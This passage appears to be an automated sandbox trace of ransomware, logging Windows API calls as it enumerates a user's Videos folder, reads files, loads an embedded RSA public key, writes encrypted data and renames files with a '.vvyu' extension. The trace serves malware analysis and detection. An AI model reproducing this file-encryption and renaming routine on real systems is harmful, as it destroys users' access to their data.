| out: hHeap=0x2c0000) returned 1 [0191.934] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6128 [0191.934] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0191.934] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e40 [0191.934] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0191.935] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae60f8 [0191.935] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0191.935] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae60e0 [0191.935] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0191.935] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6140 [0191.935] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae60e0 | out: hHeap=0x2c0000) returned 1 [0191.935] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae60e0 [0191.935] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae60f8 | out: hHeap=0x2c0000) returned 1 [0191.935] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e00 [0191.935] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0191.935] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26aa8 [0191.935] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0191.935] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1c) returned 0x2ad7ba8 [0191.935] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae60b0 | out: hHeap=0x2c0000) returned 1 [0191.935] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae60b0 [0191.935] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0191.935] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x2af3f88 [0191.936] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6110 | out: hHeap=0x2c0000) returned 1 [0191.936] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a198d0 [0191.936] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6140 | out: hHeap=0x2c0000) returned 1 [0191.936] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x2af4198 [0191.936] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0191.936] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x2f5b18 [0191.936] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0191.936] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a197b8 [0191.936] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae60b0 | out: hHeap=0x2c0000) returned 1 [0191.936] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x2af43b0 [0191.936] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a198d0 | out: hHeap=0x2c0000) returned 1 [0191.937] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae03e0 [0191.937] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0191.937] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f8 | out: hHeap=0x2c0000) returned 1 [0191.938] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae01d0 | out: hHeap=0x2c0000) returned 1 [0191.938] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae03e0 | out: hHeap=0x2c0000) returned 1 [0191.938] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26aa8 | out: hHeap=0x2c0000) returned 1 [0191.938] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a197b8 | out: hHeap=0x2c0000) returned 1 [0191.939] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af4198 | out: hHeap=0x2c0000) returned 1 [0191.939] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af43b0 | out: hHeap=0x2c0000) returned 1 [0191.939] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0191.939] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0191.940] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae60e0 | out: hHeap=0x2c0000) returned 1 [0191.940] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0191.940] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6128 | out: hHeap=0x2c0000) returned 1 [0191.940] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0191.940] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae60c8 | out: hHeap=0x2c0000) returned 1 [0191.940] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6098 | out: hHeap=0x2c0000) returned 1 [0191.940] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2eb8 | out: hHeap=0x2c0000) returned 1 [0191.941] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0191.941] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adffc0 | out: hHeap=0x2c0000) returned 1 [0191.941] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6080 | out: hHeap=0x2c0000) returned 1 [0191.942] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3978 | out: hHeap=0x2c0000) returned 1 [0191.942] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0191.942] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae04e8 | out: hHeap=0x2c0000) returned 1 [0191.943] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40108 | out: hHeap=0x2c0000) returned 1 [0191.943] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a19588 | out: hHeap=0x2c0000) returned 1 [0191.943] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26b08 | out: hHeap=0x2c0000) returned 1 [0191.943] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0191.943] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0191.943] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9ed0 | out: hHeap=0x2c0000) returned 1 [0191.944] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0191.944] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0191.944] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adfa00 | out: hHeap=0x2c0000) returned 1 [0191.945] WriteFile (in: hFile=0x584, lpBuffer=0x2af5168*, nNumberOfBytesToWrite=0x15bee, lpNumberOfBytesWritten=0x2f9fb14, lpOverlapped=0x0 | out: lpBuffer=0x2af5168*, lpNumberOfBytesWritten=0x2f9fb14*=0x15bee, lpOverlapped=0x0) returned 1 [0191.946] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af5168 | out: hHeap=0x2c0000) returned 1 [0191.946] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x15bf3, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0191.946] WriteFile (in: hFile=0x584, lpBuffer=0x2ae00c8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ae00c8*, lpNumberOfBytesWritten=0x2f9fb50*=0x100, lpOverlapped=0x0) returned 1 [0191.947] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae00c8 | out: hHeap=0x2c0000) returned 1 [0191.947] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0191.947] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x2af3f88 [0191.947] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2af3f88, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0191.947] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x2af43b8 [0191.947] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0191.948] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0191.948] WriteFile (in: hFile=0x584, lpBuffer=0x2af43b8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2af43b8*, lpNumberOfBytesWritten=0x2f9fb50*=0x28, lpOverlapped=0x0) returned 1 [0191.948] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af43b8 | out: hHeap=0x2c0000) returned 1 [0191.948] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0191.948] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x2f9fb50*=0x26, lpOverlapped=0x0) returned 1 [0191.948] CloseHandle (hObject=0x584) returned 1 [0191.951] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40108 [0191.951] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0191.952] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40108 | out: hHeap=0x2c0000) returned 1 [0191.952] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Videos\\9hkv.mp4" (normalized: "c:\\users\\keecfmwgj\\videos\\9hkv.mp4"), lpNewFileName="C:\\Users\\kEecfMwgj\\Videos\\9hkv.mp4.vvyu" (normalized: "c:\\users\\keecfmwgj\\videos\\9hkv.mp4.vvyu")) returned 1 [0191.954] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0191.954] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0191.954] VirtualFree (lpAddress=0x2620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0191.957] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ee78 | out: hHeap=0x2c0000) returned 1 [0191.957] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe138b9c0, ftCreationTime.dwHighDateTime=0x1d89a97, ftLastAccessTime.dwLowDateTime=0xd50a4720, ftLastAccessTime.dwHighDateTime=0x1d89e81, ftLastWriteTime.dwLowDateTime=0xd50a4720, ftLastWriteTime.dwHighDateTime=0x1d89e81, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="cvfGVyFL7tFjUO7", cAlternateFileName="CVFGVY~1")) returned 1 [0191.957] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ee78 [0191.957] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0191.957] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2efb0 [0191.958] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0191.958] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ee78 | out: hHeap=0x2c0000) returned 1 [0191.958] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x798ad850, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798ad850, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e7e35a0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0191.958] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af3978 [0191.958] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x5e) returned 0x2a2ee78 [0191.959] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3978 | out: hHeap=0x2c0000) returned 1 [0191.959] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Videos\\desktop.ini") returned=".ini" [0191.959] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ee78 | out: hHeap=0x2c0000) returned 1 [0191.959] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x917ad4b0, ftCreationTime.dwHighDateTime=0x1d89d6a, ftLastAccessTime.dwLowDateTime=0x1967e630, ftLastAccessTime.dwHighDateTime=0x1d8a453, ftLastWriteTime.dwLowDateTime=0x1967e630, ftLastWriteTime.dwHighDateTime=0x1d8a453, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="FPzctgqI5yS", cAlternateFileName="FPZCTG~1")) returned 1 [0191.959] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40108 [0191.959] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40318 [0191.959] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40528 [0191.960] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40318 | out: hHeap=0x2c0000) returned 1 [0191.960] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40108 | out: hHeap=0x2c0000) returned 1 [0191.960] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfcea0700, ftCreationTime.dwHighDateTime=0x1d89b0f, ftLastAccessTime.dwLowDateTime=0x2512ef00, ftLastAccessTime.dwHighDateTime=0x1d8a0cc, ftLastWriteTime.dwLowDateTime=0x2512ef00, ftLastWriteTime.dwHighDateTime=0x1d8a0cc, nFileSizeHigh=0x0, nFileSizeLow=0x3eca, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="hA6nEQ04cdHym7b8.flv", cAlternateFileName="HA6NEQ~1.FLV")) returned 1 [0191.960] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af3978 [0191.960] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ee78 [0191.961] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3978 | out: hHeap=0x2c0000) returned 1 [0191.961] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Videos\\hA6nEQ04cdHym7b8.flv") returned=".flv" [0191.961] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Videos\\hA6nEQ04cdHym7b8.flv" (normalized: "c:\\users\\keecfmwgj\\videos\\ha6neq04cdhym7b8.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0191.962] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x2f9fb40 | out: lpFileSize=0x2f9fb40*=16074) returned 1 [0191.962] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2620000 [0191.966] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x3ea4, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0191.966] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x2f9fb78, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb78*=0x26, lpOverlapped=0x0) returned 1 [0191.968] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ba8 [0191.969] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0191.969] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0191.969] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x2f9fb70, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb70*=0x3eca, lpOverlapped=0x0) returned 1 [0191.971] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0191.971] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f1) returned 0x2a7d6f0 [0191.971] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0191.971] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0191.971] CryptAcquireContextW (in: phProv=0x2f9fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2f9fa50*=0x31b9f8) returned 1 [0191.972] CryptCreateHash (in: hProv=0x31b9f8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2f9fa58 | out: phHash=0x2f9fa58) returned 1 [0191.972] CryptHashData (hHash=0x2a05de8, pbData=0x2a7d6f0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0191.972] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x0, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x2f9fa54) returned 1 [0191.972] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x2a26b08 [0191.972] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x2a26b08, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x2a26b08, pdwDataLen=0x2f9fa54) returned 1 [0191.972] GetLastError () returned 0x0 [0191.972] CryptDestroyHash (hHash=0x2a05de8) returned 1 [0191.973] CryptReleaseContext (hProv=0x31b9f8, dwFlags=0x0) returned 1 [0191.973] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0191.973] UuidCreate (in: Uuid=0x2f9fa48 | out: Uuid=0x2f9fa48) returned 0x0 [0191.973] UuidToStringA (in: Uuid=0x2f9fa48, StringUuid=0x2f9fa40 | out: StringUuid=0x2f9fa40) returned 0x0 [0191.973] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0191.973] RpcStringFreeA (in: String=0x2f9fa40 | out: String=0x2f9fa40) returned 0x0 [0191.973] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0191.973] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0191.973] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x3ed0) returned 0x2ae6ea0 [0191.973] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0191.974] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0191.974] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2adfa00 [0191.974] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0191.974] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2a7d6f0 [0191.974] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9ed0 [0191.974] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af3978 [0191.974] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6080 [0191.974] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af39c0 [0191.974] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6098 [0191.974] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae60c8 [0191.974] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6128 [0191.974] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae60e0 [0191.974] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x2a06f58 [0191.975] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x2aebfa0 [0191.975] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2aebfa0, Size=0x218) returned 0x2aee1c8 [0191.975] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x2af3f88 [0191.975] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae60c8 | out: hHeap=0x2c0000) returned 1 [0191.975] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae60e0 | out: hHeap=0x2c0000) returned 1 [0191.975] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6128 | out: hHeap=0x2c0000) returned 1 [0191.975] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a06f58 | out: hHeap=0x2c0000) returned 1 [0191.976] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0191.976] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6128 [0191.976] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e30 [0191.976] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae60e0 [0191.976] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ac8 [0191.976] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x2ae60c8 [0191.976] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7da0 [0191.976] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x2f5b18 [0191.976] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ba8 [0191.976] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9f30 [0191.976] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26b08 [0191.976] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x2a19588 [0191.976] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26ae8 [0191.976] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0191.977] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0191.977] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae60e0 | out: hHeap=0x2c0000) returned 1 [0191.977] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0191.977] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae60c8 | out: hHeap=0x2c0000) returned 1 [0191.977] HeapFree (in: 